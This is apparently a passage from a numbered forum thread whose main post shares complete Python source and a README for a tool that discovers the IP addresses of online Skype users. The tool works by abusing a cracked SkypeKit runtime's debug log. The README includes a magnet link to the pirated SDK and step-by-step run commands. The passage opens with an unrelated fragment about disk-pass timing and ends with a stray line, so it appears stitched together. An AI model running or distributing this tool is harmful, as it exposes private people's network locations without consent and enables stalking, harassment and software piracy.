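print "%.0f minutes (~%.1f hours) per pass" % (minutes, minutes / 60)
# -> 143 minutes (~2.4 hours) per pass

So "pretty quick work" means a couple of hours per pass for a terabyte-class drive.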
  22. http://skype-ip-finder.tk/

source code:

server.py

print('****************************************************************************');
print('Skype IP lookup daemon');
print('****************************************************************************');

# This daemon listens on a unix socket for a username string and then calls RefreshProfile()
# for that username. If the username is online, the Skypekit debug log will contain a string
# with the IP address.
#
# Put this script in skypekit-sdk_runtime-3.7.0/examples/python/tutorial and run it there.
#
# You will need to launch the SkypeKit runtime before running this daemon.
#----------------------------------------------------------------------------------
# Importing necessary libraries. Note that you will need to set the keyFileName value
# in the keypair.py file.
import sys;
import socket
import os, os.path
import stat     # needed for the os.chmod() flags below (missing from the original listing)
import time
import keypair;
from time import sleep;

sys.path.append(keypair.distroRoot + '/ipc/python');
sys.path.append(keypair.distroRoot + '/interfaces/skype/python');

try:
    import Skype;
except ImportError:
    raise SystemExit('Program requires Skype and skypekit modules');

#----------------------------------------------------------------------------------
# Taking skypename and password arguments from the command line.
if len(sys.argv) != 3:
    print('Usage: python vcard_socket.py <skypename> <password>');
    sys.exit();

accountName = sys.argv[1];
accountPsw = sys.argv[2];
loggedIn = False;

#----------------------------------------------------------------------------------
# Creating our main Skype object
try:
    MySkype = Skype.GetSkype(keypair.keyFileName);
    MySkype.Start();
except Exception:
    raise SystemExit('Unable to create Skype instance');

#----------------------------------------------------------------------------------
# Defining our own Account property change callback and assigning it to the
# Skype.Account class.
def AccountOnChange(self, property_name):
    global loggedIn;
    if property_name == 'status':
        if self.status == 'LOGGED_IN':
            loggedIn = True;
            print('Login complete.');

Skype.Account.OnPropertyChange = AccountOnChange;

#----------------------------------------------------------------------------------
# Defining our own Contact property change callback and assigning it to the
# SkyLib.Contact class.
def ContactOnPropertyChange(self, property_name):
    if property_name == 'availability':
        print('Online status event: ' + self.displayname + ' is now ' + self.availability);

Skype.Contact.OnPropertyChange = ContactOnPropertyChange;

#----------------------------------------------------------------------------------
# Retrieving the account and logging in with it.
account = MySkype.GetAccount(accountName);
print('Logging in with ' + accountName);
account.LoginWithPassword(accountPsw, False, False);
while loggedIn == False:
    sleep(1);

#----------------------------------------------------------------------------------
# Unix socket start
if os.path.exists("/tmp/skype_iplookup"):
    os.remove("/tmp/skype_iplookup")

print "Opening socket..."
MySocket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
MySocket.bind("/tmp/skype_iplookup")
os.chmod("/tmp/skype_iplookup", stat.S_IRWXU | stat.S_IRGRP | stat.S_IRWXO)
print "OK. Now listening..."

#----------------------------------------------------------------------------------
# Main cycle.
#
while True:
    MyUsername = MySocket.recv(1024)
    if not MyUsername:
        break
    else:
        print('Looking for ' + MyUsername + '...')
        # Be aware: the string goes into MySkype.GetContact(MyUsername).RefreshProfile() without
        # any verification of the input data. A string with illegal characters, or "echo123",
        # can break the whole program.
        MySkype.GetContact(MyUsername).RefreshProfile()
        print('Maybe done.')

client.py

# -*- coding: utf-8 -*-
import socket
import os, os.path
import sys
import re
import time

#------------------------------------------------------------------------
# Put here the path to the debug log currently being written by the skypekit runtime.
# You need to run "skypekit -d logname" before editing this.
# You can also parse the log yourself, e.g. "tail -F /some/folder/logname | grep -a noticing",
# and use client.py only to send the username into the socket.
PathToLog = "/some/folder/logname"

if len(sys.argv) == 1:
    print('Usage: python skyip.py <skypename>')
    sys.exit();

Username = sys.argv[1]

if os.path.exists("/tmp/skype_iplookup"):
    client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    client.connect("/tmp/skype_iplookup")
    client.send(Username)
    client.close()
    time.sleep(3)
    File = open(PathToLog, 'rb').readlines()
    finds = []
    for matches in File:
        # The "-r" and "-l" fields of the "noticing" log lines hold the remote and local address:port
        finded = re.findall('.*noticing.{0}.0.*-r(.*?)-l(.*?:[0-9]*?)[^0-9].*'.format(Username), matches)
        if len(finded) > 0:
            finds.append('%s - %s' % (finded[0][0], finded[0][1]))
    finds = list(set(finds))
    for f in finds:
        print f
else:
    print "Can't connect to unix socket /tmp/skype_iplookup"

README.md

Skype-iplookup

Perform an obscure IP lookup for an online Skype account. Can find both the local and the remote IP address. Based on a deobfuscated Skypekit runtime that writes a clear debug log.

How to use?

First of all you need the cracked Skypekit:

magnet:?xt=urn:btih:3da068082f6ec70be379d4046e4c77bc4578f751&dn=SkypeKit_sdk%2Bruntimes_370_412.zip&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%2Ftracker.ccc.de%3A80

This runtime also doesn't need a certificate from Skype LTD to use it. You can make your own Skype client/plugin and share the sources without the proprietary Skypekit.

Run Skypekit:

./skypekit-sdk_runtime-3.7.0/bin/linux-x86/RUNTIME_linux-x86-skypekit-voicertp-videortp_3.7.0 -x -m -d logname

Put server.py in ./skypekit-sdk_runtime-3.7.0/examples/python/tutorial/ and run it:

python2.6.5 ./server.py username password

Beware of logging in with your main account!

Edit the path to the log file in client.py and try it.

https://github.com/zhovner/Skype-iplookup/

via: http://board.protecus.de/t42182.htm
  23. ctrl a / ctrl c / ctrl v